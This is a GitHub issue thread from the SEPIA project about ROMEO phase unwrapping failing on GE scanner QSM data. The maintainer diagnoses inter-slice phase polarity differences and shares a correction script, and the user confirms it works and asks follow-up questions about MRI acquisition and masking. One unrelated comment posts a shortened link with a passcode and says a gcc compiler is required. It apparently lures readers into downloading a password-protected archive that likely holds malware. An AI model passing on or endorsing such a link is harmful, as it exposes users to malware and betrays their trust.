### ISSUE TITLE
Issue with ROMEO Phase Unwrapping in SEPIA Pipeline for GE Scanner QSM Data

### ISSUE THREAD

**Issue by LuuuXG** [kschan0214/sepia#92]
Hi,
Thank you for the handy QSM preprocessing GUI! I successfully ran the pipeline and obtained an acceptable QSM chimap. However, after reviewing the discussion section on the GitHub page, I noticed the recommendation of specific parameters for QSM consensus data processing (as described [here](https://github.com/kschan0214/QSM_Consensus_Paper_Example_Code)). My QSM data was acquired using a GE scanner, and I found that both the MEDI and FANSI pipelines employ the `ROMEO total field calculation` for echo phase combination.
Unfortunately, the ROMEO algorithm did not seem to produce the desired output in my case, specifically for the fieldmap and the subsequent images. 
![image](https://github.com/user-attachments/assets/f4996f49-0725-4c27-9cd8-252da07d80ae)
I have read through [issue #85](https://github.com/kschan0214/sepia/issues/85) and tried performing phase unwrapping with ROMEO, with both `bipolar eddy correction` and `MCPC-3D-S` set to off. However, the result still appears unreliable.
I would appreciate any insight into what might be causing this issue, as I’ve obtained good results using other methods.
I have attached an example dataset and the SEPIA log file for reference. Looking forward to your suggestions!
https://drive.google.com/file/d/1Jb2TdxUY5hC88nqMQpluTXM6nNE1EFvK/view?usp=sharing

**Comment by danilobalderramas** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by kschan0214** [comment]
Hi Youjie,

The issue you encountered is different from Issue #85. The artefact you observed is caused by the inter-slice phase polarity differences in the GE data (see the discontinuity between even and odd number slices):
 
<img width="1065" alt="Screenshot 2024-09-05 at 5 17 25 PM" src="https://github.com/user-attachments/assets/2d762376-053c-4ce5-8a18-3edfa444aafc">

and causes the subsequent phase unwrapping method fail.

In the consensus paper's tutorial, I did not obatin the phase data from dcm2niix on the GE data. Instead, I got only the real and imaginary images. In Step 4 of the [tutorial](https://github.com/kschan0214/QSM_Consensus_Paper_Example_Code?tab=readme-ov-file), the interslice polarity is corrected in the preparation [script](https://github.com/kschan0214/QSM_Consensus_Paper_Example_Code/blob/main/From_DICOM_zip_file_to_SEPIA_ready/Preparation_04_prepare_for_sepia.m). If you have the real/imaginary NIFTI data, you may try to follow the tutorial. Alternatively, you can try the attached script here:
[correct_GE_interslice_phase_offset.zip](https://github.com/user-attachments/files/16900374/correct_GE_interslice_phase_offset.zip) which should fix your issue. In my preliminary testing, you will need to turn the "MCPC-3D-S phase offset correction" option to "On" for your data when you use ROMEO for total field calculation.

Let me know how it goes!

Kwok

**Comment by LuuuXG** [comment]
Thank you for your help! I used the script and configuration file from the zip you provided, and I successfully obtained the susceptibility map. 

![image](https://github.com/user-attachments/assets/81d3e894-ae4d-4572-94c3-a4ab4c1f87b9)

Before closing this issue, I have a few additional questions to clarify:
1. You mentioned "inter-slice phase polarity differences" in your previous response. Does this imply that my QSM data was acquired using a "bipolar" readout? After reading [this paper](https://www.nature.com/articles/s41598-023-28265-0) and two discussions on Neurostars ([topic 1](https://neurostars.org/t/importance-for-reverse-acquisition-in-dti-preprocessing/17680), [topic 2](https://neurostars.org/t/multi-echo-anatomical-mri-bids-questions/17157)), I understand that a bipolar acquisition is somewhat similar to an EPI readout, where the direction alternates between echoes. I suspect the "inter-slice phase polarity differences" could be related to an issue during the raw data saving process, as outlined in the consensus paper. Are there any resources you would recommend for learning about this concept? I'm still unfamiliar with some basic MRI principles.
2. For my dataset, I used `Optimum weights` and `MEDI nonlinear fit` for total field recovery and phase unwrapping. The output Chimap seemed to be fine. However, after realizing the issue with discrepancy of interslice polarity, I wonder whether this discrepancy was automatically corrected by these methods, or if I may have missed something critical.
3. As demonstrated in Figures 5 and 6 of the consensus paper (and in the SEPIA 101 exercise), applying stricter masks improves the quality of QSM reconstruction. However, this also results in the erosion of brain tissue, which poses a challenge when registering to standard MNI space for whole-brain analysis. Is this a common issue, or is there a recommended strategy for handling this paradox?

Apologies for the questions beyond the scope of the original issue, but I would greatly appreciate any further clarification on these points!
